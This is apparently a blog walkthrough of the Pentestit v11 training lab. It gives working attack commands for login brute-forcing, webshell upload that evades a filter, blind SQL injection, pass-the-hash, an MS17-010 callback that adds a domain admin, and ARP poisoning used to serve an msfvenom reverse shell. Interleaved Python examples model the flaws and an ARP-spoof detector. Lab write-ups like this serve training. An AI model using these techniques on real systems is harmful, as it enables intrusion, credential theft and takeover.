Pentestit v11

Hey all,

Lately, I've been dedicating my spare time to Pentestit v11, a terrific pentest lab that is great for honing those skills. If you have the spare time, I highly recommend participating.

Version 11 is named “Who is Mr. Hacker?”.  To start, we are given a network diagram and two target IP addresses: and  For this post, I’ve created my own network diagram so I can mark it up along the way.

Obviously there are spoilers ahead.

The Target


External Enumeration

With the initial lab VPN connection established, we begin by scanning the two given IP addresses.


TCP/80 is a WordPress blog that doesn't offer much in the way of surface area. Scanning it quickly reveals a web application firewall (WAF) between us and the site. Note: when scanning, use a non-default user-agent or the WAF will filter your requests.


So not too much, but keep the kittycatfish plugin in mind because we'll end up using it later. TCP/8080 is a Roundcube webmail login page; without a valid email address it offers little attack surface. TCP/25 is an SMTP server with VRFY and EXPN disabled, and trying to enumerate users via RCPT TO just throws an error, so not much there either. TCP/2222 is an SSH server that only accepts key-pair authentication. TCP/88 is a Vtiger CRM v6.3.0 site with a login page, which looks promising.



The application version is printed in the clear right on the login page, very kind of Vtiger. This version has a known authenticated RCE vulnerability, but we need valid credentials before we can reach it. The Vtiger wiki lists the default credentials as admin/admin; unfortunately the password has been changed, so let's use patator to start a brute-force attack. There is an anti cross-site request forgery (CSRF) token; however, to be honest, I'm not sure if it is enforced during login, as there are no error messages when submitting an incorrect token. Either way, it's not a bad idea to GET and POST the correct anti-CSRF token (__vtrftk), just in case.

Using gotmilk's blog post as a reference, I put together this patator startup script.

# Fetch the login page once: -D saves the response headers (for the PHPSESSID
# cookie) and -A sets a browser user-agent so the WAF does not drop the request.
bulk=$(curl -sD headers.txt -A "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" "")
echo "${bulk}"
# Sanity check only: the anti-CSRF token lives in the csrfMagicToken JS variable
# on the login page; patator re-extracts it per request via before_egrep below.
CSRF=$(printf '%s\n' "${bulk}" | grep -o 'csrfMagicToken = "[^"]*"' | cut -d '"' -f2)
SESSID=$(grep -i 'PHPSESSID' headers.txt | cut -d ' ' -f2 | cut -d ';' -f1)
echo "${CSRF}"
echo "${SESSID}"

# before_urls re-fetches the login page before every attempt so _CSRF_ is always
# fresh; accept_cookie=0 keeps the session fixed to the one captured above.
# If the captured token already begins with "sid:", drop the literal "sid:"
# prefix from body= so it is not sent twice.
python /root/tools/patator/ http_fuzz \
  url="" method=POST \
  body="__vtrftk=sid:_CSRF_&username=admin&password=FILE0" 0=rockyou.txt \
  follow=1 accept_cookie=0 header="Cookie: ${SESSID}" \
  before_urls="" before_header="Cookie: ${SESSID}" \
  before_egrep='_CSRF_:var csrfMagicToken = "(\S+)"' \
  -x ignore:egrep="Invalid username or password"

As seen above, the rockyou.txt wordlist was used; it's pretty beefy and will take a while. I recommend brute-forcing overnight, perhaps with a second task running in tandem over a reversed rockyou wordlist. Either that, or just look below.


Also, it's not a bad idea to do a demo run through Burp Suite just to make sure the requests and responses are as expected. With patator (v0.7), add the following:

proxy= proxy_type=http

With valid credentials, we can reach that authenticated RCE vulnerability. To navigate to the vulnerable page, select the gear in the top right corner –> CRM Settings –> Templates –> Company Details –> Edit –> Browse –> Save. Uploading a PHP shell directly gets rejected, so instead upload an image and send the legitimate request to Burp Suite's Repeater module. With Repeater we can resubmit modified requests without the hassle of constantly intercepting. Below is an example of a simple PHP command shell upload.


If everything worked, the webshell should now be in the /test/logo directory. Note: if the string "php" appears anywhere in your shell, the page throws an error. So if you want a webshell with a few more features, such as B374K, upload a base64-encoded version ... just remember to remove "php" at the top.
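The upload check described above is a substring blacklist on the file contents, not image validation, which is why a shell written with a short echo tag (no "php" anywhere) or a base64-encoded body slips through. The following is an added example of mine, not the lab's or Vtiger's code, putting that naive check beside a stricter one (extension allowlist, magic bytes that match the extension, and rejection of any code marker). The function names, the sample payloads and the magic-byte table are my own constructions.

```python
"""Naive upload blacklist versus a stricter image validator (added example)."""
from __future__ import annotations

import os

# Magic bytes for the image types a logo upload should accept (assumed allowlist).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Byte sequences that turn an "image" into server-side code if the webroot executes it.
CODE_MARKERS = (b"<?", b"<script", b"<%")


def naive_filter(filename: str, data: bytes) -> bool:
    """Models the behaviour in the post: reject only if the bytes contain 'php'."""
    return b"php" not in data.lower()


def strict_filter(filename: str, data: bytes) -> bool:
    """Extension allowlist + magic bytes matching the extension + no code markers."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return False
    if not data.startswith(MAGIC[ext]):
        return False
    return not any(marker in data for marker in CODE_MARKERS)


# Constructed payloads: a classic shell, a short-tag shell with no 'php' in it,
# a GIF/PHP polyglot, and a minimal but genuine PNG header.
FULL_TAG_SHELL = b"<?php system($_GET['c']); ?>"
SHORT_TAG_SHELL = b"<?= system($_GET['c']); ?>"
POLYGLOT = MAGIC[".gif"] + b"9a" + b"\x00" * 8 + SHORT_TAG_SHELL
REAL_PNG = MAGIC[".png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 13

CASES = {
    "shell.php (full tag)": ("shell.php", FULL_TAG_SHELL),
    "shell.php (short tag)": ("shell.php", SHORT_TAG_SHELL),
    "logo.gif (polyglot)": ("logo.gif", POLYGLOT),
    "logo.png (real)": ("logo.png", REAL_PNG),
}


def compare() -> dict[str, tuple[bool, bool]]:
    """Return {case: (naive_accepts, strict_accepts)} for every constructed sample."""
    return {name: (naive_filter(fn, d), strict_filter(fn, d)) for name, (fn, d) in CASES.items()}


if __name__ == "__main__":
    for name, (naive_ok, strict_ok) in compare().items():
        verdict = lambda ok: "accept" if ok else "reject"
        print(f"{name:24} naive={verdict(naive_ok):6} strict={verdict(strict_ok)}")
```

Even the strict check is only a filter; the real fix is to store uploads outside the webroot under a server-chosen name (or re-encode the image), so that nothing the user controls is ever executed by the web server.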

Exploring the filesystem will quickly reveal the CRM token, named rce_token.txt.


Within the CRM admin page, Darthvader's user preferences contain key information that can aid other attacks. To see it, start in the upper right corner and select Preferences from the drop-down menu named darthvader.


Great, we have an email address, which might open up an avenue on the Roundcube webmail page. While Vader is the man when it comes to overthrowing the oppression of the Jedi, fortunately for us he sucks at passwords. On Roundcube, username: admin@test.lab and password: darthvader.


Copy the private key from the email and SSH into the second office at, as per the network diagram.

ssh tech@ -p 2222 -i ssh-office2-priv.key


As expected, we now have access to the second office subnet. In /etc/openvpn there is an OpenVPN configuration file for connecting to TCP/1194 on


We do not have permission to read /opt/openvpn/auth.txt; however, the authentication username appears to be Office-2. We will need this file later, but for now let's shift focus back to the second office subnet. Scanning each of the endpoints reveals that RDP (TCP/3389) is the only open port.


With nothing beyond RDP exposed on the endpoints in that subnet, we're probably looking at another brute-force attack. Using proxychains, enumerate the RDP users on each of the potential targets: connecting with an empty username lands on the logon screen, which lists the local accounts.

ssh tech@ -D 9000 -p 2222 -i ssh-office2-priv.key
proxychains xfreerdp /sec:tls /u:"" /v:
    • arm554
    • user
    • arm550
    • user
    • arm672
    • user

Naturally, you might think that the user account, and maybe even the arm accounts, share the same password; that is not the case. Take my word for it and brute-force arm554 on

ssh -L 3389: -p 2222 -i ssh-office2-priv.key tech@
crowbar -u arm554 -s -l log.txt -o out.txt -b rdp -C /usr/share/john/password.lst


RDP in as arm554 and map /tmp as a shared drive to transfer files.

proxychains xfreerdp /v: /sec:tls /u:arm554 /p:tiger /drive:test,/tmp/

Arm554 is an unprivileged user account on a vanilla Windows 7 machine with no patches installed. There are plenty of options; I used a PowerShell MS16-032 exploit, which eliminates the need to compile anything. After escalating privileges, we find the token on user's desktop.


Additionally, there is a directory called "Old test.lab users" containing files with details about various users, including an NT hash. This feeds into one of the later challenges, but I'm not going to lie, I missed it the first time around.


There isn't anything else to grab from, so let's step back and focus on the server.conf OpenVPN configuration file obtained from. Modify server.conf so it can be used to brute-force the OpenVPN server on by removing the auth-user-pass line that points at the authentication file (crowbar supplies the credentials itself). Additionally, copy the certificate into a separate file, openvpn.crt.


Then we spin up the brute-force attack with crowbar.

crowbar -s -b openvpn --config /root/CTFs/Pentestit/v11/server.conf --username Office-2 -k /root/CTFs/Pentestit/v11/openvpn.crt -C /usr/share/john/password.lst


Stepping out, here is where we are at.


By establishing a VPN connection to, we can bypass the WAF protecting SITE, the WordPress host on TCP/80.


Recall the WordPress Kittycatfish vulnerability enumerated with wpscan during external enumeration.

While poking around the vulnerable page, I noticed that the left parameter disappears when the condition in the GET request is false. For example, if kc_ad=16, then left: 50%; is on the page; however, if kc_ad=32, or kc_ad=16 AND 1=2, then left: 50%; is replaced by : px;.


Knowing this, we can enumerate with sqlmap's --string switch. --string tells sqlmap to treat a response as TRUE when the given text appears in the page body and FALSE otherwise, which is exactly the boolean oracle this injection point gives us.

sqlmap --random-agent -u "" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;"

Walking through the databases and tables with sqlmap is pretty straightforward; if you need help, jump over to the usage guide. The SITE token is in the database and can be dumped with the sqlmap line below.

sqlmap --random-agent -u "" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;" -D testlabdb -T tl_token --dump
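To make concrete what sqlmap is doing behind --string, here is an added example of mine (not the lab's, the plugin's or sqlmap's code) that simulates the page behaviour described above and extracts a value through the boolean oracle with binary search. An in-memory sqlite3 database stands in for MySQL, so the function names differ slightly (sqlite: length/substr/unicode, MySQL: LENGTH/SUBSTRING/ASCII), but the logic is identical. The kc_ads and tl_token tables, their contents and the token value are constructed.

```python
"""Boolean-based blind SQL injection against a simulated Kittycatfish-style page."""
import sqlite3

MARKER = "left: 50%;"  # what sqlmap --string watches for


def _build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE kc_ads (id INTEGER PRIMARY KEY, position_left INTEGER);
        INSERT INTO kc_ads VALUES (16, 50);
        CREATE TABLE tl_token (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO tl_token VALUES (1, 'SITE-t0k3n');   -- constructed token
        """
    )
    return con


DB = _build_db()
REQUESTS = {"count": 0}  # how many "HTTP requests" the extraction costs


def render_ad(kc_ad: str) -> str:
    """The vulnerable handler: kc_ad is interpolated straight into the query (the bug)."""
    REQUESTS["count"] += 1
    row = DB.execute(f"SELECT position_left FROM kc_ads WHERE id = {kc_ad}").fetchone()
    if row is None:
        return '<div class="kc_ad" style="left: px;"></div>'  # the FALSE page
    return f'<div class="kc_ad" style="left: {row[0]}%;"></div>'  # the TRUE page


def oracle(condition: str) -> bool:
    """sqlmap's --string test: TRUE iff MARKER is present in the response."""
    return MARKER in render_ad(f"16 AND ({condition})")


def bsearch(expr: str, lo: int, hi: int) -> int:
    """Find the integer value of a scalar subquery in [lo, hi] with ~log2(hi-lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(column: str, table: str) -> str:
    """Recover one text cell a character at a time through the boolean oracle."""
    length = bsearch(f"SELECT length({column}) FROM {table} LIMIT 1", 0, 256)
    return "".join(
        chr(bsearch(f"SELECT unicode(substr({column}, {i}, 1)) FROM {table} LIMIT 1", 0, 255))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    print("kc_ad=16 ->", render_ad("16"))
    print("kc_ad=16 AND 1=2 ->", render_ad("16 AND 1=2"))
    print("token:", extract("token", "tl_token"), "in", REQUESTS["count"], "requests")
```

Each character costs eight requests and the length a further eight, which is why sqlmap's --threads option matters for blind extraction and why the --risk/--level combination above is what found the injection point in the first place.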



Browsing to responds with two options: admin panel and local storage. Local storage brings us to a login prompt that is vulnerable to SQL injection. If it's a bit difficult to see in the screenshot: username: a' OR 1=1;--  / password: whatever


Bypassing the login page brings us to a scan page with quite a few images along with their filenames. One filename is entirely different from all the others; plugging that string into a hex-to-ASCII converter gives us the CUPS token.

Additionally, there is an image of an RSA private key, which we'll obviously need later.



Enumerating with nmap, we find that is a domain controller for the test.lab domain (the name, duh). Using the Metasploit module auxiliary/gather/kerberos_enumusers we can enumerate accounts on the domain without any credentials: the KDC answers an AS-REQ for an existing principal with KDC_ERR_PREAUTH_REQUIRED and for a non-existent one with KDC_ERR_C_PRINCIPAL_UNKNOWN, so the error code alone tells valid usernames apart.


As seen above, account arm554 is present in the test.lab domain. Using the NT hash we acquired from the RDP target, pass the hash to gain access to the files share. Token.txt is the AD token and network_test.txt has credentials for the next challenge. The contents of network_test.txt are as follows:

Hi, mate! Need to test ARP-table in DIR subnet.
I'll install intercepter admin:77_GrantedSuperAdmin_77


To be honest, the first time through I did not grab the AD token by passing the hash.  Instead, I used MS17-010 to gain access with a few modifications.

def smb_pwn(conn):
    # Post-exploitation callback of the MS17-010 script: runs as SYSTEM on the DC,
    # so we add a local account and drop it straight into Domain Admins.
    smbConn = conn.get_smbconnection()  # kept from the original handler; unused here
    service_exec(conn, r'cmd /c net user cplsec P@ssw0rd123! /add && net group "domain admins" cplsec /add /domain')



However, don't fling exploit code where it isn't needed: MS17-010 kernel exploits can crash the target, while pass-the-hash (pth) gets the same access quietly with the hash we already have.

Recall, we acquired an image of an SSH private key for. After unsuccessfully playing around with various OCR solutions, I manually typed out the private key; it was not fun ... you're welcome.


Spin up a SOCKS proxy and connect to using the credentials we acquired from AD.

ssh -D 9000 -i CTFs/Pentestit/v11/manualkey.txt morgan@
proxychains xfreerdp /u:admin /p:77_GrantedSuperAdmin_77 /v: /drive:test,/tmp/

In c:\soft there is a collection of files, including Intercepter-NG and netcat for Windows. Smart-scan the network, assign as a target, and set as the gateway.


Use a pcap filter in RAW mode to show traffic from and only:

host or

Start the sniffer, NAT, and ARP poisoning in the MITM mode section. If everything was configured correctly, we should see an HTTP request intercepted from, destined for


As seen above, is requesting quake3.exe. Using msfvenom, generate a stageless reverse TCP shell for Windows.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > quake3.exe

Copy quake3.exe over to and, using Intercepter's injection rules, create a rule that injects our reverse shell exe when comes knocking for it.


Restart the ARP poisoning and listen on port 443 with netcat (run it as administrator and open the port in the host firewall). Eventually a reverse shell should spawn from. The token, along with an SSH key for, can be found in the c:\users\director\documents directory.
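The ARP poisoning above is noisy on the wire: the attacker's MAC starts answering for both the gateway and the victim, and the victim's IP-to-MAC mapping flips back and forth whenever the real host replies. As an added example (mine, not from the post or Intercepter-NG) of what a passive monitor on that subnet would catch, the following detector runs over a constructed set of ARP replies and flags both signals. The IP and MAC addresses and the ArpReply record are made up for the illustration.

```python
"""ARP-poisoning detector run over constructed ARP replies (added example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float        # seconds since capture start
    sender_ip: str   # the address the reply claims to own
    sender_mac: str  # the hardware address it maps that IP to


GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
DIRECTOR_IP, DIRECTOR_MAC = "10.0.0.50", "00:11:22:33:44:50"
ATTACKER_IP, ATTACKER_MAC = "10.0.0.99", "aa:bb:cc:dd:ee:ff"

# Constructed capture: legitimate replies first, then the poisoner claims both
# ends of the conversation, then the real gateway answers again (flapping).
SAMPLE = [
    ArpReply(0.0, GATEWAY_IP, GATEWAY_MAC),
    ArpReply(0.5, DIRECTOR_IP, DIRECTOR_MAC),
    ArpReply(1.0, ATTACKER_IP, ATTACKER_MAC),
    ArpReply(2.0, GATEWAY_IP, ATTACKER_MAC),
    ArpReply(2.0, DIRECTOR_IP, ATTACKER_MAC),
    ArpReply(2.5, GATEWAY_IP, GATEWAY_MAC),
]


def detect_arp_spoof(replies, pinned=None):
    """Return (kind, ts, detail) alerts; `pinned` seeds known-good IP -> MAC pairs."""
    ip_to_mac = dict(pinned or {})       # last MAC seen claiming each IP
    mac_to_ips = defaultdict(set)        # every IP each MAC has claimed
    alerts = []
    for r in replies:
        prev = ip_to_mac.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            alerts.append(("ip-moved", r.ts, f"{r.sender_ip}: {prev} -> {r.sender_mac}"))
        ip_to_mac[r.sender_ip] = r.sender_mac
        claimed = mac_to_ips[r.sender_mac]
        if r.sender_ip not in claimed:
            claimed.add(r.sender_ip)
            if len(claimed) > 1:  # fire once per newly claimed extra address
                alerts.append(("mac-multi-ip", r.ts, f"{r.sender_mac} claims {sorted(claimed)}"))
    return alerts


def suspects(alerts):
    """MACs that answered for more than one IP: the likely poisoner(s)."""
    return {a[2].split(" ")[0] for a in alerts if a[0] == "mac-multi-ip"}


if __name__ == "__main__":
    found = detect_arp_spoof(SAMPLE, pinned={GATEWAY_IP: GATEWAY_MAC})
    for kind, ts, detail in found:
        print(f"{ts:4.1f}s {kind:12} {detail}")
    print("suspects:", suspects(found))
```

On the victim the same thing shows up as two entries with one MAC in arp -a (Windows) or ip neigh (Linux); a static entry for the gateway (arp -s) stops the poison for that one mapping, which is the kind of ARP-table test the network_test.txt note is asking for.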


Once again, stepping out, here is where we are at.



Posted in CTF
